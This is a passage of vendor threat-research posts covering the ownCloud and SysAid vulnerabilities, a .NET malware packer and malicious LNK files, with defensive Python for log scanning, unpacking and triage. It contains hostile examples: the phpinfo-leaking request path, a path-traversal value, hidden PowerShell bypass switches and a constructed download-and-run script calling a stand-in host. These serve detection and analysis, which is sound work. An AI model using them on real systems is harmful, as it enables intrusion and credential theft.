ownCloud GraphAPI Sensitive Data Exposure

Overview

This week, the SonicWall Capture Labs Threat Research Team became aware of a sensitive information disclosure vulnerability in ownCloud’s graphapi application, assessed its impact and developed mitigation measures. ownCloud, open-source software for sharing and syncing files in distributed environments, published an advisory on this credential and configuration disclosure vulnerability, which affects graphapi application versions 0.2.x before 0.2.1 and 0.3.x before 0.3.1.

It can be exploited trivially by an unauthenticated remote attacker and was assigned the maximum CVSS score of 10.0. As a result, it has drawn the attention of the security community and is reportedly already being exploited in the wild, making it a strong candidate for CISA’s Known Exploited Vulnerabilities (KEV) catalog. ownCloud users are advised to follow the steps in the Remediation Recommendations section.

Update 12/3/23

Because of this vulnerability’s severity and ease of exploitation, researchers around the world have been looking for ways to exploit the containerized deployment, which was initially reported as unexploitable. Researchers at Rapid7 have since reported a technique that bypasses the hardening offered by the mod_rewrite block in the .htaccess file, making the Docker installation as vulnerable as the manual one and removing any doubt about the severity of this CVE on the grounds of limited exploitation possibilities.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-49103.

The overall CVSS score is 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

The vulnerable versions of the graphapi application, which ships by default with both the manual and the Docker-based installation methods, contain the endpoint /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. When an unauthenticated remote attacker requests that endpoint, the output of PHP’s phpinfo() function, including critical configuration details, is returned, as shown in Figure 1.

Figure 1: Vulnerable endpoint in graphapi

However, the ownCloud Docker image does not expose the vulnerable endpoint by default: an additional mod_rewrite block in the .htaccess file, illustrated in Figure 2, redirects requests for the endpoint to the login page. The manual installation, by contrast, allows access to the endpoint by default, which made the Docker deployment appear relatively safer (see the update above). Note that enabling the graphapi app is not a prerequisite for the exploit to work; the file is served directly by the web server regardless of whether the app is enabled.

Figure 2: Additional mod_rewrite block in docker installation

Triggering the vulnerability

Triggering this vulnerability only requires a GET request to the vulnerable endpoint, for example http(s)://example-owncloud[.]com/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php. The attacker needs nothing more than network access to the vulnerable instance.

Exploitation

As demonstrated in Figure 3, successful exploitation yields the attacker the web server’s environment variables as part of the phpinfo() output. In containerized deployments, where configuration is typically passed through environment variables, this can include mail server credentials, license keys, AWS secrets and other confidential data.
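Two checks a defender would run for this issue, as an added example that is not code from ownCloud, Rapid7 or SonicWall: a version test for the affected ranges named in the advisory, and a web-log sweep for requests to the phpinfo test file. The log lines are constructed (TEST-NET addresses); the 10 KB threshold used to call a 200 response a probable leak is an assumption based on the typical size of phpinfo() output.

```python
"""Added example (not from the ownCloud advisory or SonicWall): two checks a
defender would run for CVE-2023-49103. The log lines are constructed."""
import re
from typing import Dict, Iterable, List
from urllib.parse import unquote

# Root-cause file named in the advisory, relative to the ownCloud web root.
VULN_PATH = "/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php"

# Apache/nginx combined log format: client ip, request line, status, bytes.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# phpinfo() output runs to tens of kilobytes; a 200 with a body that large is a
# strong sign the endpoint was actually served (heuristic threshold, assumed).
LEAK_MIN_BYTES = 10_000


def is_vulnerable_version(version: str) -> bool:
    """True if a graphapi version is in the affected ranges from the advisory:
    0.2.x before 0.2.1 and 0.3.x before 0.3.1."""
    parts = [int(p) for p in version.strip().split(".")]
    parts += [0] * (3 - len(parts))
    major, minor, patch = parts[:3]
    return (major, minor) in ((0, 2), (0, 3)) and patch < 1


def find_exploit_attempts(log_lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return every request that touches the phpinfo test file.

    The match is on the path as a substring, after percent-decoding and
    case-folding, so a trailing segment or query string does not hide the
    request from this check the way it could from an exact-path rewrite rule."""
    hits: List[Dict[str, object]] = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        path = unquote(m.group("uri").split("?", 1)[0]).lower()
        if VULN_PATH.lower() not in path:
            continue
        size = m.group("bytes")
        hits.append({
            "ip": m.group("ip"),
            "uri": m.group("uri"),
            "status": m.group("status"),
            # 302 means the request was redirected (e.g. the Docker .htaccess
            # rule sent it to the login page); a large 200 means it was served.
            "likely_leak": m.group("status") == "200" and size.isdigit() and int(size) >= LEAK_MIN_BYTES,
        })
    return hits


# Constructed sample lines (TEST-NET addresses, not real observations).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Nov/2023:10:15:01 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 200 81234 "-" "curl/8.4.0"',
    '198.51.100.7 - - [27/Nov/2023:10:15:09 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/x?y=1 HTTP/1.1" 200 81234 "-" "curl/8.4.0"',
    '203.0.113.5 - - [27/Nov/2023:10:16:00 +0000] "GET /index.php/login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Nov/2023:10:17:42 +0000] "GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php HTTP/1.1" 302 0 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for hit in find_exploit_attempts(SAMPLE_LOG):
        print(hit)
    print("0.3.0 vulnerable:", is_vulnerable_version("0.3.0"))
```

A 302 hit still records a probe against the instance and is worth keeping for attribution; only the 200 responses with a phpinfo-sized body should trigger credential rotation.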

Figure 3: Sample successful exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:
  • IPS:4186 ownCloud GraphAPI Sensitive Data Exposure

Threat Graph

SonicWall sensors have confirmed a spike in exploitation attempts for this vulnerability, and, given the simplicity of exploitation, a further surge is likely in the coming days.

Figure 4: SonicWall signature hits data (Updated 12/3/23)

Remediation Recommendations

ownCloud has released an update to address the issue; updating the graphapi application to the latest version (0.3.1, or 0.2.1 for the 0.2.x branch) is strongly recommended.

Those who cannot update immediately can apply the workaround of deleting the root-cause file /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php, and should plan to update as soon as possible. Because the exposed output can contain credentials, any secrets the phpinfo output may have revealed (mail server credentials, license keys, cloud access keys and similar) should be rotated on instances that were reachable while vulnerable.

Relevant Links

What the 2023 MITRE ATT&CK Evaluation Results Mean for SonicWall Users

Note: Previously, we explained the MITRE ATT&CK framework and how security products are evaluated for detection efficacy and efficiency. Check out these blogs (Part 1 and Part 2) if you haven’t already.

The 2023 MITRE ATT&CK® Evaluations focused on the adversary Turla, a Russia-based threat group active since at least the early 2000s. Turla is known for deploying sophisticated proprietary tools and malware. It has targeted victims in over 45 countries, spanning a range of critical industries and infrastructure such as government agencies, diplomatic missions, military groups, research and education facilities, and media organizations.

But while Turla is unquestionably a formidable adversary, it proved no match for the SentinelOne-powered SonicWall Capture Client, as we’ll explore below.

Understanding MITRE ATT&CK and SonicWall Capture Client

Before we dive in, however, a bit of background on the MITRE ATT&CK evaluations and SonicWall Capture Client is likely to be helpful:

MITRE ATT&CK Evaluations: ATT&CK stands for “Adversarial Tactics, Techniques & Common Knowledge.” It’s designed to be a common language, the components of which are used in endless combinations to describe how threat actors operate. The MITRE Engenuity ATT&CK Evaluations are based on the MITRE ATT&CK knowledge base, a globally accessible repository of threat actor behaviors and techniques observed in real-world cyberattacks. The evaluations provide transparency and insight into how well different cybersecurity solutions can detect and prevent these tactics, as well as how they present relevant information to end users.

SonicWall Capture Client Endpoint Security: SonicWall Capture Client is a cutting-edge endpoint security solution powered by the SentinelOne Singularity platform. It leverages multiple layers of security – including real-time behavior monitoring, anti-ransomware technology and malware prevention – to automatically detect and prevent malicious activity in real time, without relying on signatures, rules or human intervention.

To reduce alert fatigue, Capture Client automatically stitches related alerts together, correlating detections across all covered attack vectors into a small number of incidents and giving analysts a full view of the attack.

Capture Client’s built-in, autonomous EDR provides automation and orchestration capabilities for rapid response and remediation actions. What’s more, Capture Client’s synergy with the rest of the SonicWall platform allows for increased visibility and protection both on and off the network.

The 2023 MITRE ATT&CK Evaluations

The 2023 MITRE ATT&CK Evaluations emulated Turla to test 30 cybersecurity vendors on their ability to detect and respond to an advanced real-world threat. Evaluation results are available on the official website, where you can view and compare the test data of each vendor across 143 sub-steps that represent the attack sequence of Turla. You can also filter the results by different criteria, such as detection type, telemetry type, platform or technique.

The test data consists of three main categories:

  • Visibility: Evaluates whether the vendor was able to detect a specific sub-step of the attack sequence and what type of telemetry (e.g., process, file, registry, network) was used to provide that detection. The higher the visibility score, the more sub-steps were detected by the vendor.
  • Analytic Quality: Evaluates the quality of the detection analytics (e.g., rules, signatures, models) used to identify a specific sub-step of the attack sequence. The analytic quality score ranges from 1 (lowest) to 5 (highest) based on criteria such as specificity, relevance, timeliness, accuracy and completeness. The higher the analytic quality score, the better the detection analytics were at capturing the adversary’s behavior.
  • Configuration Change: Evaluates whether the vendor required any configuration changes (e.g., enabling or disabling features, modifying settings) to achieve a specific detection. The configuration change score ranges from 0 (no change) to 2 (major change) based on criteria such as complexity, impact and documentation. The lower the configuration change score, the fewer changes were needed by the vendor.

SentinelOne: Once Again at the Front of the Pack

SonicWall customers trust our SentinelOne-powered Capture Client to protect them from the most advanced threats. In this year’s Evaluations, the exact agent, platform and features used to safeguard SonicWall users every day detected and blocked every phase of the Turla attack with zero delays and no unrealistic reconfigurations or bolt-on features.

It outperformed all other vendors in terms of detection and prevention capabilities, as well as analytic quality and configuration changes.

Figure 1 shows exactly what Capture Client (SentinelOne) achieved:

Figure 1: SentinelOne MITRE ATT&CK Evaluation results

These results highlight how the SentinelOne Singularity platform maps directly to the MITRE ATT&CK framework to deliver unparalleled detection and prevention of advanced threat actor tactics, techniques and procedures (TTPs). SentinelOne Singularity XDR also provides real-world information to defenders without any configuration changes – because there are no re-tests in the real world.

Figure 2: A closer look at SentinelOne evaluation results.

By choosing Capture Client (SentinelOne) for your organization, your organization can benefit from:

  • Autonomous Protection: Automatically detect and prevent malicious activity in real time across all attack surfaces.
  • High-Quality Analytics: Leverage high-quality analytics of threat behavior with specificity, relevance, timeliness, accuracy and completeness.
  • Zero Configuration Changes: Enjoy optimal performance without any configuration changes, reducing complexity and overhead.
  • Real-Time Visibility: Gain comprehensive visibility into the attack sequence and timeline, as well as threat intelligence, indicators of compromise (IOCs), root cause analysis and remediation steps.
  • Automation and Orchestration: Automate and orchestrate response and remediation actions with protection that integrates with other security tools and platforms.

Figure 3: Capture Client provides real-time visibility with Attack Storyline, which displays an attack in its entirety and combines alerts and individual events into a single, comprehensive view.

Conclusion

The MITRE ATT&CK Evaluation provides transparent and objective data, which allows vendors and users the ability to compare different cybersecurity solutions based on their ability to detect and prevent real-world threats. For those looking to purchase a reliable and effective cybersecurity solution, these results can help determine which one best suits their needs and goals.

For four consecutive years, SonicWall Capture Client has proven its industry-leading detection and protection capabilities in the MITRE ATT&CK Enterprise Evaluations. You can request a demo or a free trial of Capture Client, or compare SonicWall Capture Client (SentinelOne) with other vendors on MITRE Engenuity’s website.

SonicWall’s Elizabeth Reynolds Honored by CRN Again

SonicWall is proud to announce that Elizabeth Reynolds has been recognized in the CRN 2023 Women on the Rise list. This annual list, formerly known as CRN Rising Female Stars, honors up-and-coming, dedicated, driven women who are leaving their mark and making a difference for solution providers throughout the IT channel.

The fourth-annual list of channel Women on the Rise showcases an impressive lineup of nominees, meticulously chosen by the CRN editorial team. This selection process heavily relied on recommendations from esteemed channel chiefs and other channel management executives within the industry.

The honorees are exceptional women dedicated to supporting their channel partners in achieving success. They exhibit remarkable skills in various areas such as marketing, channel program management, and partner engagement, among others. Through their expertise, they effectively enhance their respective channel partner programs and initiatives.

“The CRN 2023 Channel Women on the Rise list showcases the women who are on the verge of becoming the future leaders and luminaries in the channel industry. These remarkable individuals consistently exhibit a strong commitment to innovation and excellence within the IT channel. Their collective efforts are instrumental in shaping a more promising future for the IT industry,” said Jennifer Follett, vice president of U.S. Content and Executive Editor of CRN at The Channel Company. “I would like to extend my congratulations to all the honorees on behalf of The Channel Company and CRN. The efforts of these emerging leaders in driving change within the IT channel will undoubtedly shape its future for years to come.”

Elizabeth is SonicWall’s Regional Sales Director of Channel Sales. Since she joined SonicWall in 2017, her expertise in operations management, analytics and communication has empowered her to make significant contributions. Elizabeth has an incredibly strong sales background and business acumen, which has helped SonicWall transform its sales organization.

“CRN recognizing Elizabeth is another indication of SonicWall’s continued commitment to our partner network and validates the talent within our organization,” said SonicWall Chief Revenue Officer Jason Carter. “Elizabeth is an incredible colleague — she’s respected by all, easy to work with and an asset to the entire SonicWall team. We’re pleased and proud that CRN has chosen to include her on its annual list of Women on the Rise.”

The Unseen Layers: Exploring the Tactics of Multistage .NET Malware Packers

OVERVIEW

Recently, the SonicWall Capture Labs Threat Research team identified a new .NET packer that is being widely used to deliver stealers such as LokiBot and AgentTesla. Multistage .NET packers leverage the dynamic loading features of the .NET framework to decrypt and load additional modules or payloads entirely in memory, without ever writing them to disk, which leaves file-based scanners with nothing but the outer layer to inspect.

To avoid detection, the packer employs evasion techniques such as polymorphic code, obfuscation and encryption. Each stage is revealed only after the previous one has been decrypted, so the malicious code constantly changes its appearance or stays concealed within layers of encryption, making static analysis difficult.

INFECTION CYCLE

Currently, the packer is mainly delivered through phishing emails carrying a .ZIP attachment; the archive contains the packer PE file.

Figure 1: Infection Chain

TECHNICAL OVERVIEW

Layer 1 of the packer stores the next layer and the final payload as encrypted resource objects. Execution begins by decrypting the next layer, which is stored as a resource of the packer file named “QuanLyKhSan.GUI.ucDichVu.FR”.

Figure 2: Resource objects stored in layer 1

Figure 3: Decryption code logic for layer 2

Layer 2, which is a DLL file, consists of six exported functions.

Figure 4: Layer 2 classes along with function names

It decrypts the resource “GloriousCore.Properties.Resources.resources.HgoHWhJ”, which holds the encrypted fifth layer. While doing so, it sleeps for 15 seconds to evade emulators, which typically give up before a delay of that length completes.

UNVEILING THE FINAL PAYLOAD

1.) Loading of Ⴈ.dll

  • a. Ⴈ.dll is hardcoded in layer 2 as an encrypted byte array.
  • b. The byte array is first transformed using a simple XOR operation.

    Figure 5: XOR operation

  • c. The transformed array is then decompressed using the deflate algorithm and loaded into memory.
  • d. “Ⴈ.dll” has an encrypted resource named “Xeros.Vu.resources.Ⴐ”.

2.) Decryption of resource “Xeros.Vu.resources.Ⴐ”

  • a. Layer 2 uses GZipStream to decompress the resource object “Ⴐ”.
  • b. It decrypts the decompressed buffer using an XOR loop.
  • c. The decrypted bytes are a DLL module called “ReactionDiffusion.dll”

    Figure 6: Function names and XOR keys are stored in an encoded array.

3.) An instance of the ReactionDiffusion.dll module is created.

  • a. ReactionDiffusion.dll decrypts the method name “CausalitySource”.

    Figure 7: Invoking the function “CausalitySource”

  • b. The resource “HgoHWhJ” is a PNG file.

  • c. The packer uses steganography to hide the encrypted layer 5. It executes the function “RestoreOriginalBitmap” to convert the pixel data of the PNG bitmap back into an encrypted byte array.

    Figure 8: Bitmap decoding function from ReactionDiffusion.dll

  • d. The encrypted byte array is decrypted using an XOR loop with a three-byte key.

    Figure 9: Decryption function for layer 5

  • e. Final output is the “Tyrone.dll” module.

4.) Tyrone.dll has an embedded encrypted final payload. In this case, it’s LokiBot.

    Figure 10: Final payload embedded as resource

  • a. Encrypted resource “bcBuFuHG” is decrypted using a simple XOR.

Figure 11: Loading of resource using Resource Manager

Figure 12: Decryption code of the final payload

Lastly, the final payload is injected into a newly spawned instance of the packer’s own process using process hollowing. The final payload in the analyzed sample is LokiBot, which we have covered in a previous blog post.
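The stages above chain a handful of byte-level transforms: XOR with a one-byte or three-byte key, raw DEFLATE, and GZip. The following is an added example, not code from the packer or from SonicWall, that implements those transforms as reusable unpacking helpers and adds the trick an analyst reaches for when the XOR key is not yet known: every PE linked with the standard stub carries the string “This program cannot be run in DOS mode.” at offset 0x4E, which is enough known plaintext to recover a short repeating key. The “PE” image and the two encrypted blobs are constructed fixtures; the keys 0x5A and 13 37 42 are arbitrary and not taken from the sample.

```python
"""Added example (not code from the packer or from SonicWall): the byte-level
transforms the layers above chain together, plus a known-plaintext trick for
recovering a short repeating XOR key. The 'PE' image is a constructed stand-in."""
import gzip
import zlib
from typing import Optional, Tuple

# Every PE linked with the standard stub carries this text at offset 0x4E.
DOS_STUB = b"This program cannot be run in DOS mode."
DOS_STUB_OFFSET = 0x4E


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key of any length; the operation is symmetric,
    so the same call encrypts and decrypts."""
    klen = len(key)
    return bytes(b ^ key[i % klen] for i, b in enumerate(data))


def unpack_xor_then_inflate(blob: bytes, key: bytes) -> bytes:
    """Layer-2 style stage: XOR first, then raw DEFLATE (no zlib header)."""
    return zlib.decompress(xor_repeating(blob, key), -zlib.MAX_WBITS)


def unpack_gunzip_then_xor(blob: bytes, key: bytes) -> bytes:
    """Resource-style stage: GZip decompress first, then XOR-decrypt."""
    return xor_repeating(gzip.decompress(blob), key)


def recover_xor_key(ciphertext: bytes, key_len: int) -> Optional[bytes]:
    """Recover a repeating XOR key of key_len bytes (<= 39) from the DOS stub
    string, which is known plaintext at a known offset in any standard PE.
    Returns None if the stub region is inconsistent with that key length."""
    end = DOS_STUB_OFFSET + len(DOS_STUB)
    if key_len < 1 or key_len > len(DOS_STUB) or len(ciphertext) < end:
        return None
    key: list = [None] * key_len
    for i, plain in enumerate(DOS_STUB):
        pos = DOS_STUB_OFFSET + i
        k = ciphertext[pos] ^ plain
        slot = pos % key_len
        if key[slot] is None:
            key[slot] = k
        elif key[slot] != k:
            return None  # contradiction: wrong key length (or not a plain PE)
    return bytes(key)


def guess_xor_key(ciphertext: bytes, max_len: int = 16) -> Optional[Tuple[int, bytes]]:
    """Try key lengths 1..max_len and return the first consistent (length, key)."""
    for klen in range(1, max_len + 1):
        key = recover_xor_key(ciphertext, klen)
        if key is not None:
            return klen, key
    return None


# --- constructed fixture -----------------------------------------------------

def make_fake_pe(body: bytes = b"<stand-in for a .NET image>") -> bytes:
    """MZ signature, zero padding, the DOS stub at 0x4E, then arbitrary bytes.
    Enough structure for the key-recovery trick; not a runnable executable."""
    return b"MZ\x90\x00" + b"\x00" * (DOS_STUB_OFFSET - 4) + DOS_STUB + b"\r\r\n$" + body


def build_sample_layers(payload: bytes) -> Tuple[bytes, bytes]:
    """Two encrypted blobs imitating the sample's stages: (a) raw DEFLATE then
    one-byte XOR, (b) three-byte XOR then GZip. Keys are arbitrary."""
    comp = zlib.compressobj(wbits=-zlib.MAX_WBITS)
    raw_deflate = comp.compress(payload) + comp.flush()
    layer_a = xor_repeating(raw_deflate, b"\x5a")
    layer_b = gzip.compress(xor_repeating(payload, b"\x13\x37\x42"))
    return layer_a, layer_b


def unpack_sample() -> dict:
    """Peel both constructed layers: (a) with the key known, (b) recovering it."""
    payload = make_fake_pe()
    layer_a, layer_b = build_sample_layers(payload)
    out_a = unpack_xor_then_inflate(layer_a, b"\x5a")
    decompressed_b = gzip.decompress(layer_b)
    guessed = guess_xor_key(decompressed_b)
    out_b = xor_repeating(decompressed_b, guessed[1]) if guessed else b""
    return {"a_ok": out_a == payload, "b_key": guessed, "b_ok": out_b == payload}
```

The order of operations matters when peeling a real sample: the XOR-then-DEFLATE stage has to be undone in that order, and the key-recovery trick only works on a buffer that is a plain PE at that point, so run it after the decompression step, not before. If every key length up to 16 fails, the buffer is either still compressed or not a PE at all.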

Evidence of the detection by SonicWall’s patented RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 13: RTDMI ATP result report conclusion

As .NET malware packers continue to evolve, so must our cybersecurity strategies. Staying informed about the latest threat vectors, adopting advanced security solutions and fostering a proactive cybersecurity posture are essential steps in mitigating the risks posed by these insidious threats. By understanding the intricacies of .NET malware packers, organizations can better protect their systems and data from the ever-present challenges of the digital landscape.

IOCs:

ZIP

  • 070b7112e24ec3a1f2d7cfab98cee1e7f3940a33b199e4ae04b367f9dd20d451

Packer

  • 301e3dd329bd0c0aa4f40a68100350867bd5c956a13f238eedbf68d58c13f2e9
  • 26c034022d9d6924477e3e79cc95590f394e3ccf2ad743163c5a80baacf2a66f
  • 4c9c03f472adf45cc9f246fdf83b28fd1e197bc2ad831dfb75371bb14d5b5585

Lokibot

  • d51297e331fce1ba9f707991445e746a5bce48b1892dfc79d107dcbff9a0b2cf

AgentTesla

  • a02e8a878b70f214f0b9cff49a7d1f594114b80dd1935f9f9e4ea19fb978ba54

SysAid Path Traversal Vulnerability

Overview

The SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures. On November 8, 2023, SysAid, an IT service management vendor, disclosed CVE-2023-47246, a zero-day path traversal vulnerability with a CVSS score of 9.8 that affects on-premise SysAid servers running versions earlier than 23.3.36. According to Microsoft’s threat intelligence team and SysAid’s advisory, it has been exploited in the wild by Lace Tempest (DEV-0950 / TA505), the same threat actor that exploited the MOVEit Transfer vulnerability and which is associated with the ransomware group known as Cl0p. SonicWall is also seeing an increasing number of active exploitation attempts. SysAid has released a patch in version 23.3.36.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-47246.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This path traversal vulnerability allows a threat actor to write a malicious WAR archive containing a web shell into the webroot of the SysAid Tomcat web service through a single POST request. The attacker then requests the web shell at the URL where it now resides to gain command execution on the server.

Triggering the Vulnerability

The vulnerability exists in the doPost method of the SysAid com.ilient.server.UserEntry class. The accountID parameter of the request is susceptible to path injection because it is passed directly into a java.io.File constructor. Decompiling the Java code shows the accountID parameter being saved into a string variable named convertParameter, as shown in Figure 1.

Figure 1: doPost method parsing accountID

convertParameter is then stored in a variable that is passed to the File constructor, as shown in Figure 2. For readability, the variable has been renamed accountIDParameter.

Figure 2: accountID being used to create a file

The path supplied in the accountID parameter determines where the data in the body of the POST request is written. To trigger and leverage the vulnerability, an attacker therefore sends a POST request with accountID set to a traversal path pointing at the directory where the request body should be written.

Exploitation

Threat actors have been observed exploiting this vulnerability by uploading a WAR archive containing a web shell into the webroot of the SysAid Tomcat web service. This is accomplished by sending a POST request whose body is a zlib-compressed WAR file containing the web shell, with the accountID parameter injected with a traversal path into the webroot directory. The threat actor then executes the web shell and gains access to the system by navigating to the location chosen through the accountID parameter.
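The root cause is a request parameter flowing unchecked into a file path. The following added example, not SysAid’s code, reproduces that pattern in Python with the vulnerable join beside a hardened version, and adds a request-side check of the kind an IPS or WAF rule would apply to the accountID value. The directory layout (/opt/sysaid/...) is assumed for illustration; the post does not state SysAid’s real installation paths.

```python
"""Added example (not SysAid's code): the user-controlled-path pattern behind
CVE-2023-47246, shown vulnerable and hardened, plus a request-side check."""
import os
from typing import Optional
from urllib.parse import unquote

# Assumed layout for illustration; the real installation paths are not stated above.
ACCOUNT_DIR = "/opt/sysaid/data/accounts"
WEBROOT = "/opt/sysaid/tomcat/webapps/ROOT"


def vulnerable_target_path(base_dir: str, account_id: str) -> str:
    """Mirrors the flaw: the request parameter is joined straight into a path,
    as if passed to new File(base, accountID). '..' segments and absolute
    values let the client choose where the POST body is written."""
    return os.path.normpath(os.path.join(base_dir, account_id))


def safe_target_path(base_dir: str, account_id: str) -> Optional[str]:
    """Hardened version. Two independent controls: an allow-list on the
    identifier's characters, and a containment check on the resolved path.
    Returns None on any violation instead of a path."""
    if not account_id or len(account_id) > 64:
        return None
    if not all(ch.isalnum() or ch in "-_" for ch in account_id):
        return None  # rejects '/', '\\', '.', '%', NUL and whitespace
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, account_id))
    if os.path.commonpath([base, candidate]) != base:
        return None  # defence in depth: never leave base_dir, even via symlink
    return candidate


def looks_like_traversal(param_value: str) -> bool:
    """Detection side: flag an accountID value that tries to leave its
    directory, after peeling up to two layers of percent-encoding."""
    value = param_value
    for _ in range(2):
        value = unquote(value)
    value = value.replace("\\", "/")
    return value.startswith("/") or ".." in value.split("/") or "\x00" in value


if __name__ == "__main__":
    hostile = "../../tomcat/webapps/ROOT"
    print("vulnerable :", vulnerable_target_path(ACCOUNT_DIR, hostile))
    print("hardened   :", safe_target_path(ACCOUNT_DIR, hostile))
    print("flagged    :", looks_like_traversal("..%2F..%2Ftomcat%2Fwebapps%2FROOT"))
```

The allow-list is the primary control; the commonpath check exists so that a future loosening of the allow-list (or a symlink inside the account directory) still cannot turn the parameter into an arbitrary write. On the detection side, decoding twice catches double-encoded sequences such as %252e%252e, which a single-pass filter would let through.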

Post-Exploitation

After gaining a web shell through the SysAid vulnerability, threat actors were seen using two PowerShell scripts for post-exploitation. The first launches a malware loader named user.exe, which loads the GraceWire trojan and injects it into Windows processes such as spoolsv.exe. After the GraceWire deployment, a second PowerShell script erases evidence of the attacker’s actions, including the SysAid on-prem server web logs. Figure 3 below shows the complete attack chain as presented by Zscaler.

Figure 3: Zscaler’s suspected exploit chain

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • Attempted Exploitation – IPS:4172 SysAid On-Prem Software Directory Traversal
  • Known Post Exploitation – SPY: 500 Malformed-ps1 ps1.OT_1
  • Known Post Exploitation – SPY: 501 Malformed-ps1 ps1.OT_2

Threat Graph

SonicWall sensors have confirmed active exploitation of this vulnerability. The graph in Figure 4 shows an increasing number of exploitation attempts, and we expect them to continue to increase.

Figure 4: SonicWall IPS 4172 Threat Graph

Remediation Recommendations

SysAid has released an update to patch the vulnerability, and it is strongly recommended to update to version 23.3.36 or later if running a SysAid On-Prem server. The SysAid advisory also publishes relevant IOCs and recommendations for identifying compromise. Because the attackers’ second script wipes the server’s web logs, a clean log should not by itself be taken as proof that a server exposed before patching was not compromised.

Relevant Links

Malicious LNK Files Use PowerShell to Deliver Payload

Overview

This week, the SonicWall Capture Labs Threat Research team observed an increase in shortcut-based (LNK) malware. These seemingly legitimate shortcut files execute a PowerShell command that downloads malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits – UNIQLO 2023.lnk
  • Requirements and responsibilities – UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file runs an instance of powershell.exe in the background. PowerShell is built into Windows and is mostly used as a scripting language for automating administrative tasks, which makes it a convenient, already-trusted tool for attackers to abuse.

The script is base64 encoded; once decoded, its main purpose turns out to be downloading additional files from a remote server.

Figure 1: Command line

The script runs without the user’s knowledge, with PowerShell invoked using the following options:

powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand

-NoLogo and -NoProfile suppress the banner and any profile scripts, -WindowStyle hidden keeps the console window off screen, -ExecutionPolicy bypass sidesteps the script execution policy, and -EncodedCommand takes the script as base64-encoded UTF-16LE so that no readable command appears in the shortcut.
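The command line above is what an analyst recovers from the shortcut’s arguments field. The following added example, not part of the original analysis, decodes the -EncodedCommand blob and flags the evasion switches and download-and-run cues in the plaintext. PowerShell accepts any unambiguous prefix of a switch (-w, -win, -WindowStyle), so the matcher works on prefixes rather than exact names. The embedded script and the 198.51.100.20 host are constructed; only the svczHost.exe name and the Windows Temp location come from the post.

```python
"""Added example (not from the original analysis): decode and triage the kind
of PowerShell command line these LNK files carry. The script and host below are
constructed; the svczHost.exe name and Windows Temp location are from the post."""
import base64
import binascii
import re
from typing import Dict

# Constructed stand-in for the downloader that the decoded script contained.
SAMPLE_SCRIPT = (
    "$c = New-Object Net.WebClient; "
    "$c.DownloadFile('http://198.51.100.20/svczHost.exe', \"$env:windir\\Temp\\svczHost.exe\"); "
    "Start-Process \"$env:windir\\Temp\\svczHost.exe\""
)

_CUE_RE = re.compile(
    r"(?i)\b(?:DownloadFile|DownloadString|DownloadData|Invoke-WebRequest|iwr|"
    r"Invoke-RestMethod|irm|Net\.WebClient|Invoke-Expression|iex|Start-Process|"
    r"Start-BitsTransfer|curl|wget)\b"
)


def encode_command(script: str) -> str:
    """Produce a -EncodedCommand argument: PowerShell expects base64 of UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")


def _switch(token: str, full_name: str, min_prefix: str) -> bool:
    """True if token is an accepted abbreviation of full_name (prefix match),
    e.g. -w / -win / -WindowStyle. min_prefix avoids ambiguous one-letter hits."""
    t = token.lower().lstrip("-/")
    return len(t) >= len(min_prefix) and t.startswith(min_prefix) and full_name.startswith(t)


def triage_command_line(cmdline: str) -> Dict[str, object]:
    """Pull out the evasion switches and decode -EncodedCommand, then look for
    download-and-run cues in the plaintext script."""
    toks = cmdline.split()
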